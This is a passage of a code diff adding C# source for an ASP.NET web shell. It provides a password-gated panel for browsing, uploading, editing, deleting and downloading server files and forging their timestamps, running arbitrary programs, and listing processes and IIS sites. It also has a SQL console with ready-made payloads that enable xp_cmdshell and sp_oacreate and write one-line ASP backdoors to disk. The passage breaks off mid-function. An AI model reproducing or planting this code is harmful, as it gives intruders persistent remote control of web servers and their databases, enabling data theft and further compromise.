+        string OS = "OS Version : " + Environment.OSVersion + "</br>";
+        string IISversion = "IIS Version : " + Request.ServerVariables["SERVER_SOFTWARE"] + "<br>";
+        string PATH_INFO = "PATH_TRANSLATED : " + Request.ServerVariables["PATH_TRANSLATED"] + "<br>";
+        InfoLabel.Text = "<hr><center><b><U>SYS-INFO</U></B></center>";
+        InfoLabel.Text += ServerIP + HostName + OS + IISversion + PATH_INFO + "<hr>";
+        InfoLabel.Text += Bin_Process() + "<hr>";
+        
+    }
+    private bool CheckIsNumber(string sSrc)
+    {
+        System.Text.RegularExpressions.Regex reg = new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$");
+
+        if (reg.IsMatch(sSrc))
+        {
+            return true;
+        }
+        else
+        {
+            return false;
+        }
+    }
+    public string Bin_iisinfo() 
+    {
+        string iisinfo = "";
+        string iisstart = "";
+        string iisend = "";
+        string iisstr = "IIS://localhost/W3SVC";
+        int i = 0;
+        try
+        {
+            DirectoryEntry mydir = new DirectoryEntry(iisstr);
+            iisstart = "<input type=hidden name=goaction><input type=hidden name=todo><TABLE width=100% align=center border=0><TR align=center><TD width=6%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>";
+            foreach (DirectoryEntry child in mydir.Children)
+            {
+                if (CheckIsNumber(child.Name.ToString()))
+                {
+                    string dirstr = child.Name.ToString();
+                    string tmpstr = "";
+                    DirectoryEntry newdir = new DirectoryEntry(iisstr + "/" + dirstr);
+                    DirectoryEntry newdir1 = newdir.Children.Find("root", "IIsWebVirtualDir");
+                    iisinfo += "<TR><TD align=center>" + (i = i + 1) + "</TD>";
+                    iisinfo += "<TD align=center>" + newdir1.Properties["AnonymousUserName"].Value + "</TD>";
+                    iisinfo += "<TD>" + child.Properties["ServerBindings"][0] + "</TD>";
+                    iisinfo += "<TD><a href=javascript:Command('change','" + formatpath(newdir1.Properties["Path"].Value.ToString()) + "');>" + newdir1.Properties["Path"].Value + "</a></TD>";
+                    iisinfo += "</TR>";
+                }
+            }
+            iisend = "</TABLE><hr>";
+        }
+        catch (Exception error)
+        {
+            Bin_Error(error.Message);
+        }
+          return iisstart + iisinfo + iisend;
+    }
+    public string Bin_Process()
+    {
+        string htmlstr = "<center><b><U>PROCESS-INFO</U></B></center><TABLE width=80% align=center border=0><TR align=center><TD width=20%><B>ID</B></TD><TD align=left width=20%><B>Process</B></TD><TD align=left width=20%><B>MemorySize</B></TD><TD align=center width=10%><B>Threads</B></TD></TR>";
+            string prostr = "";
+            string htmlend = "</TR></TABLE>";
+            try
+            {
+                Process[] myprocess = Process.GetProcesses();
+                foreach (Process p in myprocess)
+                {
+                    prostr += "<TR><TD align=center>" + p.Id.ToString() + "</TD>";
+                    prostr += "<TD align=left>" + p.ProcessName.ToString() + "</TD>";
+                    prostr += "<TD align=left>" + p.WorkingSet.ToString() + "</TD>";
+                    prostr += "<TD align=center>" + p.Threads.Count.ToString() + "</TD>";
+                }
+            }
+            catch (Exception Error)
+            {
+                Bin_Error(Error.Message);
+            }
+        return htmlstr + prostr + htmlend;
+    }
+    protected void LoginButton_Click(object sender, EventArgs e)
+    {
+        string MD5Pass = FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text,"MD5").ToLower();
+        if (MD5Pass == Password)
+        {
+            Session[SessionName] = "BIN";
+            Bin_main();
+        }
+        else
+        {
+            Bin_login();
+        } 
+    }
+
+    protected void LogoutButton_Click(object sender, EventArgs e)
+    {
+        Session.Abandon();
+        Bin_login();
+    }
+
+    protected void FileButton_Click(object sender, EventArgs e)
+    {
+        Bin_LoginPanel.Visible = false;
+        Bin_MenuPanel.Visible = true;
+        Bin_MainPanel.Visible = false;
+        Bin_FilePanel.Visible = true;
+        Bin_CmdPanel.Visible = false;
+        Bin_SQLPanel.Visible = false;
+        Bin_SuPanel.Visible = false;
+        Bin_IISPanel.Visible = false;
+        Bin_PortPanel.Visible = false;
+        Bin_RegPanel.Visible = false;
+        Bin_upTextBox.Text = formatpath(Server.MapPath("."));
+        Bin_CopyTextBox.Text = formatpath(Server.MapPath("."));
+        Bin_upTextBox.Text = formatpath(Server.MapPath("."));
+        Bin_FileList(Server.MapPath("."));
+       
+    }
+
+    protected void MainButton_Click(object sender, EventArgs e)
+    {
+        Bin_main();
+    }
+    public void Bin_DriveList() 
+    {
+        string file = "<input type=hidden name=goaction><input type=hidden name=todo>";
+        file += "<hr>Drives : ";
+        string[] drivers = Directory.GetLogicalDrives();
+        for (int i = 0; i < drivers.Length; i++)
+        {
+            file += "<a href=javascript:Command('change','" + formatpath(drivers[i]) + "');>" + drivers[i] + "</a>&nbsp;";
+        }
+        file += "    WebRoot :  <a href=javascript:Command('change','" + formatpath(Server.MapPath(".")) + "');>" + Server.MapPath(".") + "</a>";
+        Bin_FileLabel.Text = file;
+    }
+
+    public void Bin_FileList(string Bin_path)
+    {
+        Bin_FilePanel.Visible = true;
+        Bin_CreateTextBox.Text = "";
+        Bin_CopytoTextBox.Text = "";
+        Bin_CopyTextBox.Text = Bin_path;
+        Bin_upTextBox.Text = Bin_path;
+        Bin_IISPanel.Visible = false;
+        Bin_DriveList();
+        string tmpstr="";
+        string Bin_Filelist = Bin_FilelistLabel.Text;
+        Bin_Filelist = "<hr>";
+        Bin_Filelist += "<table width=90% border=0 align=center>";
+        Bin_Filelist += "<tr><td width=40%><b>Name</b></td><td width=15%><b>Size(Byte)</b></td>";
+        Bin_Filelist += "<td width=25%><b>ModifyTime</b></td><td width=25%><b>Operate</b></td></tr>";
+        try
+        {
+            Bin_Filelist += "<tr><td>";
+            string parstr = "";
+            if (Bin_path.Length < 4)
+            {
+                parstr = formatpath(Bin_path);
+              
+            }
+            else 
+            {
+                parstr =  formatpath(Directory.GetParent(Bin_path).ToString());
+              
+            }
+            Bin_Filelist += "<i><b><a href=javascript:Command('change','" + parstr + "');>|Parent Directory|</a></b></i>";
+            Bin_Filelist += "</td></tr>";
+            
+            DirectoryInfo Bin_dir = new DirectoryInfo(Bin_path);
+            foreach (DirectoryInfo Bin_folder in Bin_dir.GetDirectories())
+            {
+                string foldername = formatpath(Bin_path) + "/" + formatfile(Bin_folder.Name);
+                tmpstr += "<tr>";
+                tmpstr += "<td><a href=javascript:Command('change','" + foldername + "')>" + Bin_folder.Name + "</a></td><td><b><i>&lt;dir&gt;</i></b></td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_folder.Name) + "</td><td><a href=javascript:Command('renamedir','" + foldername + "');>Ren</a>|<a href=javascript:Command('showatt','" + foldername + "/');>Att</a>|<a href=javascript:Command('deldir','" + foldername + "');>Del</a></td>";
+                tmpstr += "</tr>";
+            }
+            foreach (FileInfo Bin_file in Bin_dir.GetFiles())
+            {
+                string filename = formatpath(Bin_path) + "/" + formatfile(Bin_file.Name);
+                tmpstr += "<tr>";
+                tmpstr += "<td>" + Bin_file.Name + "</td><td>" + Bin_file.Length + "</td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_file.Name) + "</td><td><a href=javascript:Command('edit','" + filename + "');>Edit</a>|<a href=javascript:Command('rename','" + filename + "');>Ren</a>|<a href=javascript:Command('down','" + filename + "');>Down</a>|<a href=javascript:Command('showatt','" + filename + "');>Att</a>|<a href=javascript:Command('del','" + filename + "');>Del</a></td>";
+                tmpstr += "</tr>";
+            }
+            tmpstr += "</talbe>";
+        }
+        catch (Exception Error)
+        {
+            Bin_Error(Error.Message);
+
+        }
+
+        Bin_FilelistLabel.Text = Bin_Filelist + tmpstr;
+    }
+    public void Bin_Filedel(string instr,int type)
+    {
+        try
+        {
+            if (type == 1)
+            {
+                File.Delete(instr);
+            }
+            if (type == 2)
+            {
+                foreach (string tmp in Directory.GetFileSystemEntries(instr))
+                {
+                    if (File.Exists(tmp))
+                    {
+                        File.Delete(tmp);
+                    }
+                    else
+                    {
+                        Bin_Filedel(tmp, 2);
+                    }  
+                }
+                Directory.Delete(instr);  
+            }
+        }
+        catch (Exception Error)
+        {
+            Bin_Error(Error.Message);
+        }
+        Bin_FileList(Bin_upTextBox.Text); 
+    }
+    public void Bin_FileRN(string instr,int type) 
+    {
+        try
+        {
+            if (type == 1)
+            {
+                string[] array = instr.Split(',');
+
+                File.Move(array[0], array[1]);
+            }
+            if (type == 2)
+            {
+                string[] array = instr.Split(',');
+                Directory.Move(array[0], array[1]);
+            }
+        }
+        catch (Exception Error)
+        {
+            Bin_Error(Error.Message);
+        }
+        Bin_FileList(Bin_upTextBox.Text);
+    }
+    public void Bin_Filedown(string instr) 
+    {
+        try
+        {
+            FileStream MyFileStream = new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read);
+            long FileSize = MyFileStream.Length;
+            byte[] Buffer = new byte[(int)FileSize];
+            MyFileStream.Read(Buffer, 0, (int)FileSize);
+            MyFileStream.Close();
+            Response.AddHeader("Content-Disposition", "attachment;filename=" + instr);
+            Response.Charset = "UTF-8";
+            Response.ContentType = "application/octet-stream";
+            Response.BinaryWrite(Buffer);
+            Response.Flush();
+            Response.End();
+        }
+        catch (Exception Error)
+        {
+            Bin_Error(Error.Message); 
+        }
+        
+    }
+    public void Bin_Fileatt(string instr)
+    {
+        Bin_AttPanel.Visible = true;
+        Bin_FilePanel.Visible = true;
+        try
+        {
+            string Att = File.GetAttributes(instr).ToString();
+            Bin_ReadOnlyCheckBox.Checked = false;
+            Bin_SystemCheckBox.Checked = false;
+            Bin_HiddenCheckBox.Checked = false;
+            Bin_ArchiveCheckBox.Checked = false;
+
+            if (Att.LastIndexOf("ReadOnly") != -1)
+            {
+                Bin_ReadOnlyCheckBox.Checked = true;
+            }
+            if (Att.LastIndexOf("System") != -1)
+            {
+                Bin_SystemCheckBox.Checked = true;
+            }
+            if (Att.LastIndexOf("Hidden") != -1)
+            {
+                Bin_HiddenCheckBox.Checked = true;
+            }
+            if (Att.LastIndexOf("Archive") != -1)
+            {
+                Bin_ArchiveCheckBox.Checked = true;
+            }
+            Bin_CreationTimeTextBox.Text = File.GetCreationTime(instr).ToString();
+            Bin_LastWriteTimeTextBox.Text = File.GetLastWriteTime(instr).ToString();
+            Bin_AccessTimeTextBox.Text = File.GetLastAccessTime(instr).ToString();
+        }
+        catch (Exception Error)
+        {
+            Bin_Error(Error.Message);
+        }
+        Bin_AttLabel.Text = instr;
+        Session["FileName"] = instr;
+        Bin_DriveList();
+    }
+    public void Bin_FileEdit(string instr)
+    {
+        Bin_FilePanel.Visible = true;
+        Bin_EditPanel.Visible = true;
+        Bin_DriveList();
+        Bin_EditpathTextBox.Text = instr;
+        StreamReader SR = new StreamReader(instr, Encoding.Default);
+        Bin_EditTextBox.Text = SR.ReadToEnd();
+        SR.Close();
+    }
+    protected void Bin_upButton_Click(object sender, EventArgs e)
+    {
+       
+            string uppath = Bin_upTextBox.Text;
+            if (uppath.Substring(uppath.Length - 1, 1) != @"/")
+            {
+                uppath = uppath + @"/";
+            }
+            try
+            {
+                Bin_UpFile.PostedFile.SaveAs(uppath + Path.GetFileName(Bin_UpFile.Value));
+                
+            }
+            catch (Exception error)
+            {
+                Bin_Error(error.Message);
+            }
+            Bin_FileList(uppath);
+    }
+    public void Bin_Error(string error)
+    {
+        Bin_ErrorLabel.Text = "Error : " + error;
+    }
+    public string formatpath(string instr)
+    {
+        instr = instr.Replace(@"\", "/");
+        if (instr.Length < 4)
+        {
+            instr = instr.Replace(@"/", "");
+        }
+        if (instr.Length == 2)
+        {
+            instr = instr + @"/";
+        }
+        instr = instr.Replace(" ", "%20");
+        return instr;
+    }
+    public string formatfile(string instr)
+    {
+        instr = instr.Replace(" ", "%20");
+        return instr;
+      
+    }
+    protected void Bin_GoButton_Click(object sender, EventArgs e)
+    {
+        Bin_FileList(Bin_upTextBox.Text);
+    }
+
+    protected void Bin_NewFileButton_Click(object sender, EventArgs e)
+    {
+        string newfile = Bin_CreateTextBox.Text;
+        string filepath = Bin_upTextBox.Text;
+        filepath = filepath + "/" + newfile;
+        try
+        {
+            StreamWriter sw = new StreamWriter(filepath, true, Encoding.Default);
+            
+        }
+        catch (Exception Error)
+        {
+            Bin_Error(Error.Message);
+        }
+        Bin_FileList(Bin_upTextBox.Text);
+    }
+
+    protected void Bin_NewdirButton_Click(object sender, EventArgs e)
+    {
+        string dirpath = Bin_upTextBox.Text;
+        string newdir = Bin_CreateTextBox.Text;
+        newdir = dirpath + "/" + newdir;
+        try
+        {
+            Directory.CreateDirectory(newdir);
+           
+        }
+        catch(Exception Error)
+        {
+            Bin_Error(Error.Message);
+        }
+        Bin_FileList(Bin_upTextBox.Text);
+    }
+
+    protected void Bin_CopyButton_Click(object sender, EventArgs e)
+    {
+        string copystr = Bin_CopyTextBox.Text;
+        string copyto = Bin_CopytoTextBox.Text;
+        try
+        {
+            File.Copy(copystr, copyto);
+        }
+        catch (Exception Error)
+        {
+             Bin_Error(Error.Message);
+        }
+        Bin_CopytoTextBox.Text = "";
+        Bin_FileList(Bin_upTextBox.Text);
+    }
+
+    protected void Bin_CutButton_Click(object sender, EventArgs e)
+    {
+        string copystr = Bin_CopyTextBox.Text;
+        string copyto = Bin_CopytoTextBox.Text;
+        try
+        {
+            File.Move(copystr, copyto);
+        }
+        catch (Exception Error)
+        {
+            Bin_Error(Error.Message);
+        }
+        Bin_CopytoTextBox.Text = "";
+        Bin_FileList(Bin_upTextBox.Text);
+    }
+
+    protected void Bin_SetButton_Click(object sender, EventArgs e)
+    {
+        try
+        {
+            string FileName = Session["FileName"].ToString();
+            File.SetAttributes(FileName, FileAttributes.Normal);
+            if (Bin_ReadOnlyCheckBox.Checked)
+            {
+                File.SetAttributes(FileName, FileAttributes.ReadOnly);
+            }
+
+            if (Bin_SystemCheckBox.Checked)
+            {
+                File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.System);
+            }
+            if (Bin_HiddenCheckBox.Checked)
+            {
+                File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Hidden);
+            }
+            if (Bin_ArchiveCheckBox.Checked)
+            {
+                File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Archive);
+            }
+            if (FileName.Substring(FileName.Length - 1, 1) == "/")
+            {
+                Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
+                Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
+                Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
+            }
+            else
+            {
+                File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
+                File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
+                File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
+            }
+        }
+        catch (Exception Error)
+        {
+            Bin_Error(Error.Message);
+        }
+        Bin_FileList(Bin_upTextBox.Text);
+        Response.Write("<script>alert('Success!')</sc" + "ript>");
+    }
+
+    protected void Bin_EditButton_Click(object sender, EventArgs e)
+    {
+        try
+        {
+            StreamWriter SW = new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default);
+            SW.Write(Bin_EditTextBox.Text);
+            SW.Close();
+        }
+        catch (Exception Error)
+        {
+            Bin_Error(Error.Message); 
+        }
+        Bin_FileList(Bin_upTextBox.Text);
+        Response.Write("<script>alert('Success!')</sc" + "ript>");
+        
+    }
+    
+    protected void Bin_BackButton_Click(object sender, EventArgs e)
+    {
+        Bin_FileList(Bin_upTextBox.Text);
+    }
+
+    protected void Bin_SbackButton_Click(object sender, EventArgs e)
+    {
+        Bin_FileList(Bin_upTextBox.Text);
+    }
+
+    protected void Bin_CmdButton_Click(object sender, EventArgs e)
+    {
+        Bin_MenuPanel.Visible = true;
+        Bin_LoginPanel.Visible = false;
+        Bin_CmdPanel.Visible = true;
+        Bin_SQLPanel.Visible = false;
+        Bin_CmdLabel.Text = "";
+        Bin_SuPanel.Visible = false;
+        Bin_IISPanel.Visible = false;
+        Bin_RegPanel.Visible = false;
+        Bin_PortPanel.Visible = false;
+    }
+
+    protected void Bin_RunButton_Click(object sender, EventArgs e)
+    {
+        try
+        {
+            Process Cmdpro = new Process();
+            Cmdpro.StartInfo.FileName = Bin_CmdPathTextBox.Text;
+            Cmdpro.StartInfo.Arguments = Bin_CmdShellTextBox.Text;
+            Cmdpro.StartInfo.UseShellExecute = false;
+            Cmdpro.StartInfo.RedirectStandardInput = true;
+            Cmdpro.StartInfo.RedirectStandardOutput = true;
+            Cmdpro.StartInfo.RedirectStandardError = true;
+            Cmdpro.Start();
+            string cmdstr = Cmdpro.StandardOutput.ReadToEnd();
+            cmdstr = cmdstr.Replace("<", "&lt;");
+            cmdstr = cmdstr.Replace(">", "&gt;");
+            Bin_CmdLabel.Text = "<hr><div id=\"cmd\"><pre>" + cmdstr + "</pre></div>";
+        }
+        catch (Exception Error)
+        {
+            Bin_Error(Error.Message); 
+        }  
+    }
+
+    protected void Bin_SQLButton_Click(object sender, EventArgs e)
+    {
+        Bin_CmdPanel.Visible = false;
+        Bin_SQLPanel.Visible = true;
+        Bin_LoginPanel.Visible = false;
+        Bin_MenuPanel.Visible = true;
+        Bin_AccPanel.Visible = false;
+        Bin_Scroll.Visible = false;
+        Bin_DBmenuPanel.Visible = false;
+        Bin_dirPanel.Visible = false;
+        Bin_SuPanel.Visible = false;
+        Bin_IISPanel.Visible = false;
+        Bin_PortPanel.Visible = false;
+        Bin_RegPanel.Visible =false;
+    }
+
+    protected void Bin_SQLRadioButton_CheckedChanged(object sender, EventArgs e)
+    {
+        Session["Bin_Table"] = null;
+        Bin_SQLconnTextBox.Text = "server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB";
+        Bin_SQLRadioButton.Checked = true;
+        Bin_AccRadioButton.Checked = false;
+        Bin_AccPanel.Visible = false;
+        Bin_DataGrid.Visible = false;
+        Bin_Scroll.Visible = false;
+        Bin_DBmenuPanel.Visible = false;
+        Bin_dirPanel.Visible = false;
+    }
+
+    protected void Bin_AccRadioButton_CheckedChanged(object sender, EventArgs e)
+    {
+        Session["Bin_Table"] = null;
+        Bin_SQLconnTextBox.Text = @"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\wwwroot\database.mdb";
+        Bin_SQLRadioButton.Checked = false;
+        Bin_AccRadioButton.Checked = true;
+        Bin_DBmenuPanel.Visible = false;
+        Bin_AccPanel.Visible = false;
+        Bin_DataGrid.Visible = false;
+        Bin_Scroll.Visible = false;
+        Bin_dirPanel.Visible = false;
+      
+    }
+    protected void OpenConnection() 
+    {
+        if (conn.State == ConnectionState.Closed)
+        {
+            try
+            {
+                conn.ConnectionString = Bin_SQLconnTextBox.Text;
+                comm.Connection = conn;
+                conn.Open();
+            }
+            catch (Exception Error)
+            {
+                Bin_Error(Error.Message);
+            }
+        }
+    }
+    protected void CloseConnection()
+    {
+        if (conn.State == ConnectionState.Open)
+            conn.Close();
+            conn.Dispose();
+            comm.Dispose();
+    }
+    public DataTable Bin_DataTable(string sqlstr)
+    {
+        OleDbDataAdapter da = new OleDbDataAdapter();
+        DataTable datatable = new DataTable();
+        try
+        {
+            OpenConnection();
+            comm.CommandType = CommandType.Text;
+            comm.CommandText = sqlstr;
+            da.SelectCommand = comm;
+            da.Fill(datatable);
+        }
+        catch (Exception)
+        {
+        }
+        finally
+        {
+            CloseConnection();
+        }
+        return datatable;
+    }
+    protected void SQL_SumbitButton_Click(object sender, EventArgs e)
+    {
+        try
+        {
+            Session["Bin_Table"] = null;
+            Bin_DataGrid.CurrentPageIndex = 0;
+            Bin_DataGrid.AllowPaging = true;
+            if (Bin_SQLRadioButton.Checked)
+            {
+                Bin_DBmenuPanel.Visible = true;
+                Bin_DBinfoLabel.Visible = true;
+                Bin_AccPanel.Visible = false;
+                Bin_Scroll.Visible = false;
+                Bin_dirPanel.Visible = false;
+                OpenConnection();
+                DataTable ver = Bin_DataTable(@"SELECT @@VERSION");
+                DataTable dbs = Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases");
+                DataTable cdb = Bin_DataTable(@"SELECT DB_NAME()");
+                DataTable rol = Bin_DataTable(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
+                DataTable owner = Bin_DataTable(@"SELECT IS_MEMBER('db_owner')");
+                string dbo = "";
+                if (owner.Rows[0][0].ToString() == "1")
+                {
+                    dbo = "db_owner";
+                }
+                else
+                {
+                    dbo = "public";
+                }
+                if (rol.Rows[0][0].ToString() == "1")
+                {
+                    dbo = "<font color=blue>sa</font>";
+                }
+                string db_info = "";
+                db_info = "<i><b><font color=red>SQLversion</font> : </b></i>" + ver.Rows[0][0].ToString() + "<br><hr>";
+                string db_name = "";
+                for (int i = 0; i < dbs.Rows.Count; i++)
+                {
+                    db_name += dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(), "<font color=blue>" + cdb.Rows[0][0].ToString() + "</font>") + "&nbsp;|&nbsp;";
+                }
+                db_info += "<i><b><font color=red>DataBase</font> : </b></i><div style=\"width:760px;word-break:break-all\">" + db_name + "<br><div><hr>";
+                db_info += "<i><b><font color=red>SRVROLEMEMBER</font></i></b> : " + dbo + "<hr>";
+                Bin_DBinfoLabel.Text = db_info;
+            }
+            if (Bin_AccRadioButton.Checked)
+            {
+                Bin_DataGrid.Visible = false;
+                Bin_SAexecButton.Visible = false;
+                Bin_Accbind();
+            }
+        }
+        catch (Exception E)
+        {
+            Bin_Error(E.Message);
+        }
+    }
+    protected void Bin_Accbind() 
+    {
+        try
+        {
+            Bin_DBmenuPanel.Visible = false;
+            Bin_AccPanel.Visible = true;
+            OpenConnection();
+            DataTable acctable = new DataTable();
+            acctable = conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" });
+            string accstr = "<input type=hidden name=goaction><input type=hidden name=todo>";
+            accstr += "Tables Count : " + acctable.Rows.Count + "<br>Please select a database : <SELECT onchange=if(this.value!='')Command('postdata',this);>";
+            for (int i = 0; i < acctable.Rows.Count; i++)
+            {
+                accstr += "<option value=" + acctable.Rows[i].ItemArray[2].ToString() + ">" + acctable.Rows[i].ItemArray[2].ToString() + "</option>";
+            }
+            if (Session["Bin_Table"] != null)
+            {
+                accstr += "<option SELECTED>" + Session["Bin_Table"] + "</option>";
+            }
+            accstr += "</SELECT>";
+            Bin_AccinfoLabel.Text = accstr;
+            CloseConnection();
+        }
+        catch (Exception Error) 
+        {
+            Bin_Error(Error.Message);
+        }
+    }
+    protected void Bin_Databind() 
+    {
+        try
+        {
+            Bin_SAexecButton.Visible = false;
+            Bin_Accbind();
+            Bin_Scroll.Visible = true;
+            if (Bin_SQLRadioButton.Checked)
+            {
+                Bin_DBmenuPanel.Visible = true;
+                Bin_DBinfoLabel.Visible = false;
+            }
+            Bin_DataGrid.Visible = true;
+            DataTable databind = Bin_DataTable(@"SELECT * FROM " + Session["Bin_Table"]);
+            Bin_DataGrid.DataSource = databind;
+            Bin_DataGrid.DataBind();     
+        }
+        catch (Exception Error)
+        {
+            
+            Bin_Error(Error.Message);
+        }
+    }
+
+    public void Bin_ExecSql(string instr) 
+    {
+        try
+        {
+            OpenConnection();
+            comm.CommandType = CommandType.Text;
+            comm.CommandText = instr;
+            comm.ExecuteNonQuery();
+        }
+        catch (Exception e) 
+        {
+            Bin_Error(e.Message);
+        }
+    }
+    public void Item_DataBound(object sender,DataGridItemEventArgs e)
+    {
+        
+        for (int i = 2; i < e.Item.Cells.Count; i++)
+        {
+            e.Item.Cells[i].Text = e.Item.Cells[i].Text.Replace("<", "&lt;").Replace(">", "&gt;");
+        }
+      
+    }
+   protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e) 
+    {
+        Bin_DataGrid.CurrentPageIndex = e.NewPageIndex;
+        Bin_Databind();
+    }
+    public void Item_Command(object sender, DataGridCommandEventArgs e) 
+    {
+        if (e.CommandName == "Cancel")
+        {
+            Bin_DataGrid.EditItemIndex = -1;
+            Bin_Databind();
+        }
+    }
+
+    protected void Bin_ExecButton_Click(object sender, EventArgs e)
+    {
+        try
+        {
+            
+            Bin_Scroll.Visible = true;
+            Bin_DataGrid.Visible = true;
+            Bin_DataGrid.AllowPaging = true;
+            Bin_Accbind();
+            if (Bin_SQLRadioButton.Checked)
+            {
+                Bin_DBmenuPanel.Visible = true;
+            }
+            string sqlstr = Bin_DBstrTextBox.Text;
+            sqlstr = sqlstr.TrimStart().ToLower();
+            if (sqlstr.Substring(0, 6) == "select")
+            {
+                DataTable databind = Bin_DataTable(sqlstr);
+                Bin_DataGrid.DataSource = databind;
+                Bin_DataGrid.DataBind();
+            }
+            else 
+            {
+                Bin_ExecSql(sqlstr);
+                Bin_Databind();
+            }
+        }
+        catch(Exception error)
+        {
+            Bin_Error(error.Message);
+        }
+    }
+
+    protected void Bin_BDButton_Click(object sender, EventArgs e)
+    {
+        Bin_DBinfoLabel.Visible = false;
+        Bin_Accbind();
+        Bin_DBmenuPanel.Visible = true;
+        Bin_DataGrid.Visible = false;
+        Bin_DataGrid.AllowPaging = true;
+        Bin_Scroll.Visible = false;
+        Bin_DBstrTextBox.Text = "";
+        Bin_SAexecButton.Visible = false;
+        Bin_ResLabel.Visible = false;
+        Bin_dirPanel.Visible = false;
+        
+    }
+    
+    protected void Bin_SACMDButton_Click(object sender, EventArgs e)
+    {
+        Bin_DBinfoLabel.Visible = false;
+        Bin_DataGrid.Visible = false;
+        Bin_Scroll.Visible = false;
+        Bin_SAexecButton.Visible = true;
+        Bin_Change();
+        Bin_ExecButton.Visible = false;
+        Bin_ResLabel.Visible = false;
+        Session["Bin_Option"] = null;
+        Bin_dirPanel.Visible = false;
+        
+    }
+    public void Bin_Change() 
+    {
+        Bin_ExecButton.Visible = false;
+        string select = "<input type=hidden name=goaction><input type=hidden name=todo><input type=hidden name=intext><select onchange=if(this.value!='')Command('changedata',this);><option>SQL Server Exec<option value=\"Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')\">Add sp_oacreate<option value=\"Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')\">Add xp_cmdshell<option value=\"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;\">Add xp_cmdshell(SQL2005)<option value=\"exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;\">Add sp_oacreate(SQL2005)<option value=\"exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;\">Open Openrowset(SQL2005)<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">XP_cmdshell exec<option value=\"Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^> > c:\\1.asp';\">SP_oamethod exec<option value=\"sp_makewebtask @outputfile='d:\\web\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))" + "%" + ">''' \">SP_makewebtask make file";
+        if (Session["Bin_Option"] != null)
+        {
+            select += "<option SELECTED>" + Session["Bin_Option"] + "</option>";
+        }
+        select += "</select>";
+        Bin_AccinfoLabel.Text = select;
+        Bin_DataGrid.Visible = false;
+        Bin_Scroll.Visible = false;
+    }
+
+    protected void Bin_SAexecButton_Click(object sender, EventArgs e)
+    {
+        try
+        {
+            Bin_Change();
+            Bin_DBinfoLabel.Visible = false;
+            Bin_ExecButton.Visible = false;
+            Bin_Scroll.Visible = false;
+            Bin_DataGrid.Visible = false;
+            Bin_DBmenuPanel.Visible = true;
+            string sqlstr = Bin_DBstrTextBox.Text;
+            DataTable databind = Bin_DataTable(sqlstr);
+            string res = "";
+            foreach (DataRow dr in databind.Rows)
+            {
+                for (int i = 0; i < databind.Columns.Count; i++)
+                {
+                    res += dr[i] + "\r";
+                }
+            }
+            Bin_ResLabel.Text = "<hr><div id=\"nei\"><PRE>" + res.Replace(" ", "&nbsp;").Replace("<", "&lt;").Replace(">", "&gt;") + "</PRE></div>";
+            
+            
+        }
+        catch (Exception error)
+        {
+            Bin_Error(error.Message);
+        }
+
+    }
+
+    protected void Bin_DirButton_Click(object sender, EventArgs e)
+    {
+        Bin_dirPanel.Visible = true;
+        Bin_AccPanel.Visible = false;
+        Bin_DBinfoLabel.Visible = false;
+        Bin_DataGrid.Visible = false;
+        Bin_Scroll.Visible = false; 
+    }
+    
+    protected void Bin_listButton_Click(object sender, EventArgs e)
+    {
+        Bin_dirPanel.Visible = true;
+        Bin_AccPanel.Visible = false;
+        Bin_DBinfoLabel.Visible = false;
+        Bin_SqlDir();
+    }
+    public void Bin_SqlDir() 
+    {
+        try
+        {
+            Bin_DataGrid.Visible = true;
+            Bin_Scroll.Visible = true;
+            Bin_DataGrid.AllowPaging = false;
+            string exesql = "use pubs;if exists (select * from sysobjects where id = object_id(N'[bin_dir]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_dir]; CREATE TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) INSERT bin_dir EXEC MASTER..XP_dirtree '" + Bin_DirTextBox.Text + "',1,1;";
+            Bin_ExecSql(exesql);
+            DataTable sql_dir = Bin_DataTable("select * from bin_dir");
+            Bin_DataGrid.DataSource = sql_dir;
+            Bin_DataGrid.DataBind();
+        }
+        catch (Exception e)
+        {
+            Bin_Error(e.Message);
+        }
+    }
+
+    protected void Bin_SuButton_Click(object sender, EventArgs e)
+    {
+        Bin_CmdPanel.Visible = false;
+        Bin_SQLPanel.Visible = false;
+        Bin_SuPanel.Visible = true;
+        Bin_IISPanel.Visible = false;
